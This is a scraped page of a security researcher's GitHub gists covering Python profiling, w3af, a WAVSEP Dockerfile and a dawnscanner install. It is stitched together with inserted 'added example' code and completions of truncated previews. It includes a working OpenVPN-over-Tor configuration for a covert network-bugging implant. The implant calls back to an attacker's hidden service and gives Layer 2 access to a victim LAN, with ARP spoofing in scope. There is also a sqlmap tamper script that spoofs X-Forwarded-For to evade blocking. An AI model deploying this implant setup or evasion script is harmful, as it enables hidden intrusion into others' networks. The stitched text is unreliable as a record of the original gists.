Andres Riancho andresriancho
@andresriancho
andresriancho / Profiling performance of real world applications.md
Created March 16, 2015 13:05
Profiling performance of real world applications

Description

In this talk we’ll discuss the challenge of profiling CPU, RAM and key performance metrics in non-trivial Python applications. There are many great tools for finding CPU and RAM bottlenecks such as memory_profiler [0], objgraph [1] and line_profiler [2], but they all seem to be focused on profiling small functions.

Real world Python applications have tens of thousands of lines of code and use threads, sub-processes and other difficult-to-profile technologies. In this situation the libraries above do not scale well.

The goal of the talk is to walk the attendees through the tools and techniques used to profile w3af, a complex Python application maintained by the speaker. The techniques [3] are reusable and give deep insight into:

  • Top 10 functions with the most CPU usage
  • Top 10 lines of code allocating the most memory
```python
import cPickle


def debug_pickle(instance):
    """
    :return: Which attribute from this object can't be pickled?
    """
    attribute = None
    for k, v in instance.__dict__.iteritems():
        try:
            cPickle.dumps(v)
        except:
            # The preview is truncated here; the loop records the name of the
            # attribute whose pickling failed so the caller can report it.
            attribute = k
            break
    return attribute
```
@andresriancho
andresriancho / ordered dict memory profiling.md
Last active August 29, 2015 14:21
Ordered dicts are hard (?)

TL;DR Use ruamel.ordereddict instead of Python's OrderedDict. Significant improvement in memory and CPU usage.

I was having memory issues with w3af so I started to experiment with different libraries for ordered dicts (since profiling was showing some strange things in that area). These are the results of some memory profiling tests I ran:

  • Lower memory usage: 11.574 MiB ruamel.ordereddict
  • Higher memory usage: 69.742 MiB SQLMap's ordered dict; almost the same memory usage as Python's collections.OrderedDict

When running the tests 100 times using timeit this is what I got on my workstation:

  • Faster: ruamel.ordereddict 7.66 seconds
"""
cswsh.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.

Yesterday I completed the development of the REST API for w3af :) The documentation can be found here and the code is ready to use in the develop branch:

```shell
git clone https://github.com/andresriancho/w3af.git
cd w3af
git checkout develop
./w3af_api
```

Before merging it to the master branch I would love to hear your opinions, bug reports, etc. Thanks!

@andresriancho
andresriancho / Dockerfile
Created July 22, 2015 17:45
WAVSEP Dockerfile
```dockerfile
FROM ubuntu:14.04
# Update Ubuntu
RUN apt-get update
RUN apt-get -y upgrade
# Add Oracle Java 7 repository (the webupd8team PPA; check that it still serves packages before relying on it)
RUN apt-get -y install software-properties-common
RUN add-apt-repository ppa:webupd8team/java
RUN apt-get -y update

# The preview continues with a second FROM, i.e. a separate variant of the image
# built on the official Tomcat image instead of a bare Ubuntu base:
FROM tomcat:7.0.63-jre8
# Download WAVSEP
WORKDIR /usr/local/tomcat/webapps/
RUN wget https://github.com/sectooladdict/wavsep/archive/wavsep-v1.5-war.zip
# Caveat: GitHub's /archive/<tag>.zip is a zip of the tagged source tree, not
# necessarily a deployable WAR; check with `unzip -l` that the layout is a WAR
# before renaming it.
RUN mv wavsep-v1.5-war.zip wavsep.war
```
@andresriancho
andresriancho / dawnscanner-installation.md
Created September 16, 2015 12:34
dawnscanner installation
```console
$ gem cert --add <(curl -Ls https://raw.githubusercontent.com/thesp0nge/dawnscanner/master/certs/paolo_at_dawnscanner_dot_org.pem)
Added '/CN=paolo/DC=dawnscanner/DC=org'
$ gem install dawnscanner -P MediumSecurity
ERROR:  While executing gem ... (Gem::Security::Exception)
    certificate /CN=paolo/DC=codesake/DC=com not valid after 2015-01-27 17:25:01 UTC
$
```
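Two things are visible in that transcript: `gem cert --add` accepts a certificate without looking at its validity window, and the signing policy only complains at install time; and the certificate that is rejected (`/CN=paolo/DC=codesake/DC=com`) is not even the one that was just added (`/CN=paolo/DC=dawnscanner/DC=org`). The quickest check before trusting a signer is `openssl x509 -in cert.pem -noout -subject -dates`. The block below is an added example, not part of the gist or of dawnscanner: a stdlib-only reader that pulls `notBefore`/`notAfter` out of a PEM certificate with a minimal DER walker, plus a constructed certificate skeleton (right structure, no real key or signature) so the check can run offline. The expiry date in `demo()` is the one from the error message above; everything else (function names, the fixture) is this example's own.

```python
import base64
import re
from datetime import datetime, timezone


def der_read(buf, pos=0):
    """Decode one DER TLV at `pos`: returns (tag, content, position after it).
    Handles short and long-form lengths; indefinite length is not DER."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("DER length runs past the end of the data")
    return tag, buf[pos:pos + length], pos + length


def der_children(content):
    """The (tag, content) pairs contained in a constructed element."""
    items, pos = [], 0
    while pos < len(content):
        tag, child, pos = der_read(content, pos)
        items.append((tag, child))
    return items


def asn1_time(tag, content):
    """UTCTime (0x17, YYMMDDHHMMSSZ, two-digit year pivoting at 50 per RFC 5280)
    or GeneralizedTime (0x18, YYYYMMDDHHMMSSZ) to an aware UTC datetime."""
    text = content.decode("ascii")
    if tag == 0x17:
        yy = int(text[:2])
        text = str(1900 + yy if yy >= 50 else 2000 + yy) + text[2:]
    elif tag != 0x18:
        raise ValueError("not an ASN.1 time, tag 0x%02x" % tag)
    return datetime.strptime(text, "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)


def cert_validity(pem):
    """(notBefore, notAfter) of a PEM certificate, read from tbsCertificate:
    [0] version (optional), serialNumber, signature, issuer, validity, ..."""
    m = re.search(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", pem, re.S)
    if not m:
        raise ValueError("no PEM certificate block found")
    der_bytes = base64.b64decode("".join(m.group(1).split()))
    _, certificate, _ = der_read(der_bytes)
    _, tbs = der_children(certificate)[0]
    fields = der_children(tbs)
    if fields[0][0] == 0xA0:          # the explicit [0] version is absent in v1 certs
        fields = fields[1:]
    (t1, nb), (t2, na) = der_children(fields[3][1])
    return asn1_time(t1, nb), asn1_time(t2, na)


def signing_cert_status(pem, now=None):
    """What a signature policy will say about this certificate at `now`."""
    now = now or datetime.now(timezone.utc)
    not_before, not_after = cert_validity(pem)
    if now > not_after:
        return "expired", not_after
    if now < not_before:
        return "not yet valid", not_before
    return "valid", not_after


# Constructed fixture: a DER skeleton with a certificate's shape, no real key or signature.
def der(tag, content):
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def constructed_cert_pem(not_before, not_after):
    utc = lambda d: der(0x17, d.strftime("%y%m%d%H%M%SZ").encode())
    alg = der(0x30, der(0x06, bytes.fromhex("2a864886f70d01010b")))  # sha256WithRSAEncryption
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02")) + der(0x02, b"\x01") + alg
              + der(0x30, b"") + der(0x30, utc(not_before) + utc(not_after))
              + der(0x30, b"") + der(0x30, b""))
    body = base64.b64encode(der(0x30, tbs + alg + der(0x03, b"\x00"))).decode()
    return "-----BEGIN CERTIFICATE-----\n%s\n-----END CERTIFICATE-----\n" % "\n".join(
        body[i:i + 64] for i in range(0, len(body), 64))


def demo():
    """The transcript's situation: a certificate not valid after 2015-01-27 17:25:01 UTC,
    checked on the gist's date (2015-09-16) and once inside its validity window."""
    expired_at = datetime(2015, 1, 27, 17, 25, 1, tzinfo=timezone.utc)
    pem = constructed_cert_pem(datetime(2014, 1, 27, 17, 25, 1, tzinfo=timezone.utc), expired_at)
    return {
        "at_install": signing_cert_status(pem, datetime(2015, 9, 16, 12, 34, tzinfo=timezone.utc))[0],
        "while_valid": signing_cert_status(pem, datetime(2014, 6, 1, tzinfo=timezone.utc))[0],
        "not_after": signing_cert_status(pem)[1].isoformat(),
    }
```

Run `cert_validity(open(path).read())` on the PEM you are about to hand to `gem cert --add`; an already expired signer is not worth adding, and a cert with a different subject than the one the gem is actually signed with will not satisfy the policy either.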
@andresriancho
andresriancho / network-bugging.md
Last active December 27, 2017 06:38
Bugging a network: Reverse VPN over Tor

Network Bug: Reverse VPN over Tor

I would like to build a network bugging device that can be connected to any Ethernet network and grants the attacker access through a reverse VPN.

Since we don't want to go to jail, the attacker's VPN server would be a Tor hidden service and the bugging device would perform a reverse connection over Tor. No direct connection to the attacker's IP address will ever be made.

All traffic between the attacker and the device will be encrypted by both Tor and the VPN.

It must be trivial for the attacker to route traffic from nmap, w3af, OpenVAS, metasploit and any other security tools through the VPN tunnel. Extra points if the VPN is Layer 2 and allows the attacker to run ARP-spoofing attacks (ssh layer 2 VPN?)
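One concrete shape for that rendezvous, as an added sketch rather than anything from the gist: the attacker runs Tor with a hidden service in front of an OpenVPN server that listens on loopback only, and the device runs a Tor client plus an OpenVPN client that reaches the .onion through Tor's SOCKS port. The onion address, paths and key material are placeholders. Tor only carries TCP streams, so OpenVPN has to run in TCP mode on both ends (with the usual TCP-over-TCP performance penalty); `dev tap` gives the Layer 2 tunnel asked for above, and bridging that tap onto the device's Ethernet port is left out here.

```text
# --- attacker side: torrc ---
HiddenServiceDir /var/lib/tor/vpn_hs/
HiddenServicePort 1194 127.0.0.1:1194

# --- attacker side: OpenVPN server, static-key point-to-point ---
local 127.0.0.1                 # only reachable through the hidden service, never on a public address
port 1194
proto tcp-server                # Tor carries TCP only; UDP mode cannot be used
dev tap0                        # Layer 2 tunnel, so ARP-level tooling sees the remote LAN
ifconfig 10.8.0.1 255.255.255.0
secret static.key               # generated once with: openvpn --genkey --secret static.key
keepalive 10 60
persist-key
persist-tun

# --- device side: OpenVPN client, next to a Tor client on the default SocksPort ---
remote xxxxxxxxxxxxxxxx.onion 1194   # placeholder onion address
proto tcp-client
socks-proxy 127.0.0.1 9050      # the .onion name is handed to Tor in the SOCKS5 CONNECT, not resolved locally
dev tap0
ifconfig 10.8.0.2 255.255.255.0
secret static.key
keepalive 10 60
persist-key
persist-tun
```

With this in place the attacker's tools simply use the tap interface (for example `nmap -e tap0 ...`) and the device never learns, or connects to, the attacker's real IP address.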

@andresriancho
andresriancho / random-xff.py
Created December 30, 2015 13:22
Random X-Forwarded-For tamper script for sqlmap
```python
import random

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL


def dependencies():
    pass


def random_ip():
    # Random dotted quad; the preview is truncated after the headers lookup, and this
    # completion follows the gist's stated purpose.
    return ".".join(str(random.randint(1, 254)) for _ in range(4))


def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = random_ip()
    return payload
```